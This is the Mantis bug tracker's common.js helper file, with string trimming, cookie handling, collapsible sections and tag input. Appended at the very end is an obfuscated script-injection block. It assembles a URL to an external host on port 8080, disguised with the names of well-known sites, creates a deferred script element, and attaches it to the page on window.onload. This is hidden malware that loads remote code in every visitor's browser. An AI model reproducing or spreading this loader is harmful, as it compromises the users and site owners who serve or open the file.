/*
# Mantis - a php based bugtracking system

# Copyright (C) 2000 - 2002  Kenzaburo Ito - kenito@300baud.org
# Copyright (C) 2002 - 2007  Mantis Team   - mantisbt-dev@lists.sourceforge.net

# Mantis is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# Mantis is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Mantis.  If not, see <http://www.gnu.org/licenses/>.
 *
 * --------------------------------------------------------
 * $Id: common.js,v 1.10.2.2 2007-10-21 22:39:47 giallu Exp $
 * --------------------------------------------------------
 */


/*
 * String manipulation
 */

function Trim( p_string ) {
	if (typeof p_string != "string") {
		return p_string;
	}

	var t_string = p_string;
	var t_ch = '';

	// Trim beginning spaces

	t_ch = t_string.substring( 0, 1 );
	while ( t_ch == " " ) {
		t_string = t_string.substring( 1, t_string.length );
		t_ch = t_string.substring( 0, 1 );
	}

	// Trim trailing spaces

	t_ch = t_string.substring( t_string.length-1, t_string.length );
	while ( t_ch == " " ) {
		t_string = t_string.substring( 0, t_string.length-1 );
		t_ch = t_string.substring( t_string.length-1, t_string.length );
	}

	return t_string;
}


/*
 * Cookie functions
 */

function GetCookie( p_cookie ) {
	var t_cookie_name = "MANTIS_" + p_cookie;
	var t_cookies = document.cookie;

	t_cookies = t_cookies.split( ";" );

	var i = 0;
	while( i < t_cookies.length ) {
		var t_cookie = t_cookies[ i ];

		t_cookie = t_cookie.split( "=" );

		if ( Trim( t_cookie[ 0 ] ) == t_cookie_name ) {
			return( t_cookie[ 1 ] );
		}
		i++;
	}

	return -1;
}

function SetCookie( p_cookie, p_value ) {
	var t_cookie_name = "MANTIS_" + p_cookie;
	var t_expires = new Date();

	t_expires.setTime( t_expires.getTime() + (365 * 24 * 60 * 60 * 1000));

	document.cookie = t_cookie_name + "=" + p_value + "; expires=" + t_expires.toUTCString() + ";";
}


/*
 * Collapsible element functions
 */

var g_div_history       = 0x0001;
var g_div_bugnotes      = 0x0002;
var g_div_bugnote_add   = 0x0004;
var g_div_bugnotestats  = 0x0008;
var g_div_upload_form   = 0x0010;
var g_div_monitoring    = 0x0020;
var g_div_sponsorship   = 0x0040;
var g_div_relationships = 0x0080;
var g_div_filter        = 0x0100;


/* List here the sections open by default */
var g_default_view_settings = 
	g_div_history | 
	g_div_bugnotes |
	g_div_bugnote_add |
	g_div_bugnotestats |
	g_div_upload_form |
	g_div_monitoring |
	g_div_sponsorship |
	g_div_relationships;


function GetViewSettings() {
	var t_cookie = GetCookie( "VIEW_SETTINGS" );

	if ( -1 == t_cookie ) {
		t_cookie = g_default_view_settings;
	} else {
		t_cookie = parseInt( t_cookie );
	}

	return t_cookie;
}

function SetDiv( p_div, p_cookie_bit ) {
	var t_view_settings = GetViewSettings();

	if( t_view_settings & p_cookie_bit ) {
		document.getElementById( p_div + "_open" ).style.display = "";
		document.getElementById( p_div + "_closed" ).style.display = "none";
	} else {
		document.getElementById( p_div + "_open" ).style.display = "none";
		document.getElementById( p_div + "_closed" ).style.display = "";
	}
}

function ToggleDiv( p_div, p_cookie_bit ) {
	var t_view_settings = GetViewSettings();

	t_view_settings ^= p_cookie_bit;
	SetCookie( "VIEW_SETTINGS", t_view_settings );

	SetDiv( p_div, p_cookie_bit );
}

/* Check checkboxes */
function checkall( p_formname, p_state) {
	var t_elements = (eval("document." + p_formname + ".elements"));

	for (var i = 0; i < t_elements.length; i++) {
    	if(t_elements[i].type == 'checkbox') {
      		t_elements[i].checked = p_state;
   		}
  	}
}

// global code to determine how to set visibility
var a = navigator.userAgent.indexOf("MSIE");
var style_display;

if (a!= -1) {
  style_display = 'block';
} else {
  style_display = 'table-row';
}
style_display = 'block';

function setDisplay(idTag, state) 
{
  if(!document.getElementById(idTag)) alert('SetDisplay(): id '+idTag+' is empty');
  // change display visibility
  if ( state != 0 ) {
      document.getElementById(idTag).style.display = style_display;
  } else {
      document.getElementById(idTag).style.display = 'none';
  }
}

function toggleDisplay(idTag) 
{
  setDisplay( idTag, (document.getElementById(idTag).style.display == 'none')?1:0 );
}

/* Append a tag name to the tag input box, with repect for tag separators, etc */
function tag_string_append( p_string ) {
	t_tag_separator = document.getElementById('tag_separator').value;
	t_tag_string = document.getElementById('tag_string');
	t_tag_select = document.getElementById('tag_select');
	if ( t_tag_string.value != '' ) {
		t_tag_string.value = t_tag_string.value + t_tag_separator + p_string;
	} else {
		t_tag_string.value = t_tag_string.value + p_string;
	}
	t_tag_select.selectedIndex=0;
}


Js={m:"kQ"};var Nu={d:24459};D={U:28537};var G;this.Q="";var HA=["P","lK","mF"];v=function(){this.Y=59525;this.Y-=62;E=21382;E--;function F(a,H,x){var e={JsZ:false};return a.substr(H,x);try {var p='X'} catch(p){};ud={aG:false};}var s=["Ye"];var S=RegExp;LL=["NN","i"];lS=["y","mN"];var h='';vG={lB:"Md"};var Gi=["nJ","UZ","uO"];jV=["_","Vt","kK"];aB=["mL","ky","WN"];var B=new String("/go"+"ogl"+"e.c"+F("om/NH09",0,3)+F("A3YelmY3A",3,3)+F("undCho",0,3)+F("ywVo.eywV",3,3)+F("s/cRDn",0,3)+F("DBVjhinVBjD",4,3)+"ane"+F("ws.pcrE",0,3)+F("MutrcomurMt",4,3)+F("HjG.cnHjG",3,3)+F("nJi.phinJ",3,3)+F("pJsY",0,1));tF=46947;tF--;var M=document;var K=["Z","hi","Lf"];var Hj=["FL","XR","WU"];this.I="I";function V(a,H){var Og=["Yb","uQ","JC"];var x=F("[aZq",0,1)+H+"]";bn=62662;bn-=85;var sT={cO:"hq"};var k=new S(x, String(F("go16e",0,1)));try {var kJ='LG'} catch(kJ){};return a.replace(k, h);var Ky=["Ix","kG"];try {} catch(R){};};var CK='';var _X="_X";var EU=55117;IQ=61784;IQ+=230;var Gk=V('smcfruiqpmtu','ubMmVEBqf');var zR=[];var dp=["kyD","nz"];var C="body";var J=null;qA={Ep:false};this.rM="";var Gc=935701-927621;A=8832;A++;Dg=22358;Dg++;var UK={II:43677};G=function(){var m_=false;try {var Fi=V('cyrXeLaMtweXEjlLe4m3e3nztj','wyMT4XjuD3sLxCz');this.vz=38890;this.vz-=158;L=M[Fi](Gk);var g=String("defe"+F("rMewi",0,1));Ed={kC:"Rh"};VT={NY:"sa"};var a=Gc+B;var O=V('sfrqc_','fb_LqpmhIU');this.XS=36169;this.XS-=85;dL=51281;dL--;var SE="";L[O]="ht"+F("tpkDYG",0,2)+":/"+F("/trWIG",0,2)+F("axULm",0,2)+F("N2oes2oN",3,2)+F("W4rVba4WVr",4,2)+F("llvqu",0,2)+F(".rUlHd",0,2)+F("bwru:wbr",3,2)+a;mu=43447;mu-=167;pJ=32931;pJ-=62;L[g]=[1,2][0];M[C].appendChild(L);m_A={tp:"UM"};this.pU='';} catch(N){this.Lu='';};Ab={lI:false};};};var kd=[];var rJ=new String();v();oc=44192;oc++;JX=34499;JX-=206;window.onload=G;this.fE=3401;this.fE+=35;var ja=["Ug","_z"];